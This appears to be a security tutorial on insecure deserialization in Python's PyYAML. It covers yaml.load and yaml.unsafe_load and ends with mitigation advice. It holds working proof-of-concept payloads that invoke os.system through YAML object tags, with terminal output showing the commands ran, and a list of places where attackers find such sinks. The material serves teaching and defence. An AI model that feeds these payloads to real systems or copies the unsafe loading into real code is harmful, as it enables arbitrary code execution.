Insecure Deserialization - Unsafe YAML Loading

Python-based Vulnerabilities Anatomy

YAML (YAML Ain’t Markup Language) is a human-readable data serialization format commonly used for configuration files and data exchange.

In Python, the PyYAML library is widely used to parse YAML content; However, improper use of this library particularly the use of unsafe loading methods can introduce a serious security issue.

PyYAML is not a built-in Python package, it’s a third-party library that must be installed separately; Despite this, it remains widely used across many Python applications, particularly for parsing configuration files, managing structured data, and integrating with tools that rely on human-readable serialization formats.

Unsafe YAML Loading Using `yaml.load()`

The yaml.load() function is capable of constructing arbitrary Python objects from YAML input; If user-controlled data is passed to this function, it can be exploited to execute arbitrary code or load dangerous objects during the deserialization process.

The following code demonstrates how YAML payloads can be deserialized using two different loaders Loader and UnsafeLoader:

import yaml
from yaml import Loader, UnsafeLoader

payload = b'!!python/object/new:os.system ["id>/tmp/yamled.lol"]'

def load_yaml_unsafe_loader(data):
	yaml.load(data, Loader=UnsafeLoader)

def load_yaml_with_loader(data):
	yaml.load(data, Loader=Loader)

load_yaml_with_loader(payload)
load_yaml_unsafe_loader(payload)

both loaders are capable of executing malicious content if used with untrusted input.

We used the payload !!python/object/new:os.system ["id>/tmp/yamled.lol"] which is a malicious YAML string designed to exploit insecure deserialization in Python using the PyYAML library.

It instructs PyYAML to construct a new object by calling the built-in os.system function, passing it a string argument.

The argument provided is the shell command id>/tmp/yamled.lol. This command runs the id utility and redirects the output to a the file /tmp/yamled.lol.

Running the code using either load_yaml_unsafe_loader() or load_yaml_with_loader() will result in the execution of the malicious payload.

Both functions use yaml.load() with loaders (UnsafeLoader and Loader) that support full object deserialization, including the ability to invoke arbitrary functions.

As a result, the payload triggers the execution of the command id > /tmp/yamled.lol. This creates a file at /tmp/yamled.lol and writes the output of the id command into it as the following:

hackpad :: /opt/PyFu/generic-py-fu » python3 unsafe-yaml.py 
hackpad :: /opt/PyFu/generic-py-fu » ls /tmp/yamled.lol  
/tmp/yamled.lol
hackpad :: /opt/PyFu/generic-py-fu » cat /tmp/yamled.lol 
uid=1001(user) gid=1001(user) groups=1001(user),27(sudo),100(users)

Unsafe YAML Loading Using `yaml.unsafe_load()`

Another function capable of triggering object deserialization in PyYAML is yaml.unsafe_load().

This function behaves similarly to yaml.load() when used with an unsafe loader it allows PyYAML to parse YAML documents that contain Python-specific tags, such as !!python/object/new, and reconstruct arbitrary Python objects during the loading process.

While unsafe_load() is explicit in its name, it is just as dangerous as using yaml.load() with UnsafeLoader or Loader.

The following code demonstrates the use of yaml.unsafe_load() to deserialize a malicious YAML payload:

import yaml

payload = b'!!python/object/new:os.system ["id>/tmp/yamled2.lol"]'
yaml.unsafe_load(payload)

When this code is executed, the yaml.unsafe_load() function processes the payload and executes the embedded command. The payload instructs PyYAML to invoke os.system with the argument id > /tmp/yamled2.lol.

hackpad :: /opt/PyFu/generic-py-fu » python3 unsafe-yaml2.py 
hackpad :: /opt/PyFu/generic-py-fu » ls /tmp/yamled2.lol 
/tmp/yamled2.lol
hackpad :: /opt/PyFu/generic-py-fu » cat /tmp/yamled2.lol 
uid=1001(user) gid=1001(user) groups=1001(user),27(sudo),100(users)

Running it in the lab

docker compose run --rm generic-py-fu sh -c "python3 unsafe-yaml.py; cat /tmp/yamled.lol"

uid=0(root) gid=0(root) groups=0(root)

The payload !!python/object/new:os.system ["id"] is an object-construction tag. yaml.load(..., Loader=UnsafeLoader) honors it and calls os.system, which yaml.safe_load would have refused outright.

Why unsafe YAML loading matters from an offensive security perspective

I prize unsafe YAML loading because it gives me pickle-grade code execution through a format that everyone treats as benign configuration data. A !!python/object/new:os.system tag is honored by yaml.load with the default loader, by UnsafeLoader, and by yaml.unsafe_load, so I never need a serialization endpoint, just a place where my YAML reaches a load call. The reader looks like harmless config parsing, which is exactly why the sink survives review.

What an attacker prizes is the gap between perception and behavior. YAML is the language of config files, CI pipelines, and API request bodies, so developers feed it user input freely, and yaml.load was the documented default for years. The result is a deserialization sink sitting in places nobody classifies as a deserialization surface.

Where I look for a reachable sink in an assessment:

API endpoints accepting application/yaml or config-import features that round-trip user YAML through yaml.load.
CI/CD and pipeline definitions parsed by Python tooling, where I influence the YAML a runner loads.
Kubernetes/IaC and plugin manifests read with the full loader instead of safe_load.
Webhook and integration payloads that arrive as YAML and get loaded for convenience.
“Restore settings” / “import profile” features that accept an uploaded YAML document.

The audit tell is any yaml.load without an explicit SafeLoader, or any yaml.unsafe_load, on data an attacker can influence; the missing safe_ is the whole bug. For defenders the takeaway is to treat a reachable full-loader yaml.load on untrusted input as equivalent to eval.

Mitigation

The fix is to call yaml.safe_load (or construct an explicit SafeLoader) for any YAML that crosses a trust boundary, which restricts parsing to plain data and refuses the object-construction tags that yaml.load with the default loader or UnsafeLoader will execute. Reserve the full loader for documents you produced yourself, treat any reachable yaml.load on untrusted input as equivalent to eval, and validate the decoded data against an expected schema rather than trusting whatever types the document declared.

Insecure Deserialization - Unsafe YAML Loading

Unsafe YAML Loading Using yaml.load()

Unsafe YAML Loading Using yaml.unsafe_load()

Running it in the lab

Why unsafe YAML loading matters from an offensive security perspective

Mitigation

New Python exploitation techniques, from the lab to your inbox

Unsafe YAML Loading Using `yaml.load()`

Unsafe YAML Loading Using `yaml.unsafe_load()`